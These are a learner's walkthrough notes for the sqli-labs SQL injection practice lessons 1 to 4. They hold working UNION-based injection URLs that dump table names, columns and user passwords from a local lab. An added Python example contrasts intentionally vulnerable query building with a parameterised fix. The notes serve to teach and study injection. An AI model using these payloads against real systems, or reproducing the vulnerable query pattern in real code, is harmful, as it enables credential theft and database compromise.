Learning SQL injection: a few notes I took while working through sqli-labs. There may be errors; if you spot one, corrections are welcome.
Common knowledge points:
1. MySQL has three kinds of comment:
① #: everything from # to the end of the line is a comment
② -- followed by a space: everything from -- to the end of the line is a comment; note that -- must be followed by a space
③ /* */: everything between /* and */ is a comment
2. Querying the database names
SELECT schema_name FROM information_schema.schemata LIMIT 0,1
3. Querying the tables of the current database
SELECT table_name FROM information_schema.tables WHERE table_schema=(SELECT DATABASE()) LIMIT 0,1
4. Querying all columns of a given table
SELECT column_name FROM information_schema.columns WHERE table_name='xxx' LIMIT 0,1
5. Union queries
SELECT id,username,password FROM users UNION SELECT 1,2,3
6. GROUP_CONCAT: merging multiple rows of results into one line
SELECT GROUP_CONCAT(username) FROM users LIMIT 0,1
GROUP_CONCAT puts many results on one line, so all the information can be displayed even when the page has only one output slot.
7. CONCAT: combining multiple fields into one field
SELECT CONCAT(username,password) FROM users
Less-1: error-based, single quote
Base URL: http://127.0.0.1/sqli-labs/Less-1/?id=
1. Test whether the id is handled as a string by appending a single quote '
http://127.0.0.1/sqli-labs/Less-1/?id='
Result: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' LIMIT 0,1' at line 1
The extra ' in the error shows that the id is wrapped in single quotes, i.e. it is treated as a string.
2. Find how many columns the query has using UNION: the test gives 3 columns, and columns 2 and 3 are displayed on the page
http://127.0.0.1/sqli-labs/Less-1/?id=' UNION SELECT 1,2,3 -- a
URL-encoded: http://127.0.0.1/sqli-labs/Less-1/?id=%27%20UNION%20SELECT%201,2,3%20--%20a
3. Querying data in the database
① Querying all tables of the current database
http://127.0.0.1/sqli-labs/Less-1/?id=' UNION SELECT 1,GROUP_CONCAT(table_name),3 FROM information_schema.tables WHERE table_schema=(SELECT DATABASE()) LIMIT 0,1 -- a
Result: Your Login name:emails,referers,uagents,users
So there are four tables.
② Viewing all columns of the users table
http://127.0.0.1/sqli-labs/Less-1/?id=' UNION SELECT 1,GROUP_CONCAT(column_name),3 FROM information_schema.columns WHERE table_name='users' LIMIT 0,1 -- a
Result: Your Login name:id,username,password
③ Querying all usernames and passwords
http://127.0.0.1/sqli-labs/Less-1/?id=' UNION SELECT 1,GROUP_CONCAT(username),GROUP_CONCAT(password) FROM users LIMIT 0,1 -- a
Result:
Your Login name:dumb,angelina,dummy,secure,stupid,superman,batman,admin,admin1,admin2,admin3,dhakkan,admin4
Your Password:dumb,i-kill-you,[email protected],crappy,stupidity,genious,mob!le,admin,admin1,admin2,admin3,dumbo,admin4
Question:
Why does the comment -- a work here while # does not?
Less-2: error-based, integer
① Test the id type
http://127.0.0.1/sqli-labs/Less-2/?id='
Result: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' LIMIT 0,1' at line 1
The error shows only ' LIMIT 0,1, so the id is numeric and is not wrapped in any quotes.
② Query all usernames and passwords, adding ORDER BY so that every row is displayed. The intermediate steps are the same as in Less-1 and are skipped.
http://127.0.0.1/sqli-labs/Less-2/?id=3 UNION SELECT 1,GROUP_CONCAT(username),GROUP_CONCAT(password) FROM users ORDER BY id LIMIT 0,1 -- a
Less-3: error-based, with an interfering parenthesis
① Test the id type
http://127.0.0.1/sqli-labs/Less-3/?id='
Result: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''') LIMIT 0,1' at line 1
The difference from Less-1 is that the id is followed by a closing parenthesis, so it can be inferred that the id is written as id=('3'). When constructing the SQL, the parenthesis has to be closed in addition to the quote.
② Querying all usernames and passwords
http://127.0.0.1/sqli-labs/Less-3/?id=3') UNION SELECT 1,GROUP_CONCAT(username),GROUP_CONCAT(password) FROM users ORDER BY id LIMIT 0,1 -- a
Less-4: error-based, double quote
① Test the id type
http://127.0.0.1/sqli-labs/Less-4/?id='
Result: the page renders normally, so keep testing. Being lazy, I follow the lesson title and go straight to testing a double quote
http://127.0.0.1/sqli-labs/Less-4/?id="
Result: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '""") LIMIT 0,1' at line 1
So the id is a string and is written as id=("3")
② Get all usernames and passwords, closing both the double quote and the parenthesis
http://127.0.0.1/sqli-labs/Less-4/?id=3") UNION SELECT 1,GROUP_CONCAT(username),GROUP_CONCAT(password) FROM users ORDER BY id LIMIT 0,1 -- a
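As an added example (not part of these notes or of sqli-labs itself), the four id-wrapping patterns of Less-1 to Less-4 rebuilt in Python with sqlite3 standing in for MySQL, beside a hardened lookup that validates the id as an integer and binds it as a query parameter. The sample rows, the TEMPLATES dictionary and all function names are assumptions; sqlite's double-quote handling differs from MySQL's, so the Less-4 template is only a rough stand-in.

```python
import sqlite3

# Constructed sample rows standing in for the lab's "users" table (not sqli-labs' real data).
SAMPLE_USERS = [(1, "alice", "alice-pw"), (2, "bob", "bob-pw"), (3, "carol", "carol-pw")]

# Assumed reconstruction of how Less-1 to Less-4 wrap the id before pasting it into the SQL.
TEMPLATES = {
    "Less-1": "SELECT username, password FROM users WHERE id='{}' LIMIT 0,1",
    "Less-2": "SELECT username, password FROM users WHERE id={} LIMIT 0,1",
    "Less-3": "SELECT username, password FROM users WHERE id=('{}') LIMIT 0,1",
    "Less-4": 'SELECT username, password FROM users WHERE id=("{}") LIMIT 0,1',
}


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", SAMPLE_USERS)
    return conn


def vulnerable_lookup(conn, lesson, user_id):
    """The lab's pattern: the raw parameter becomes part of the SQL text, so a
    stray quote or parenthesis changes the statement; the verbose syntax error
    that results is exactly what the lessons read to learn the quoting context."""
    return conn.execute(TEMPLATES[lesson].format(user_id)).fetchone()


def safe_lookup(conn, user_id):
    """Hardened version: reject anything that is not an integer, then bind the
    value as a parameter so the driver never parses it as SQL. The quote and
    parenthesis differences between the four lessons no longer matter."""
    try:
        id_value = int(str(user_id).strip())
    except ValueError:
        return None  # not a valid id: log it server-side, show the client nothing
    return conn.execute(
        "SELECT username, password FROM users WHERE id=? LIMIT 0,1", (id_value,)
    ).fetchone()


def breaks_statement(conn, lesson, probe):
    """True when `probe` makes the interpolated statement unparseable, i.e. when
    the vulnerable version would leak a syntax error to the client."""
    try:
        vulnerable_lookup(conn, lesson, probe)
        return False
    except sqlite3.OperationalError:
        return True
```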
"sqli-labs" Less-1 ~ Less-4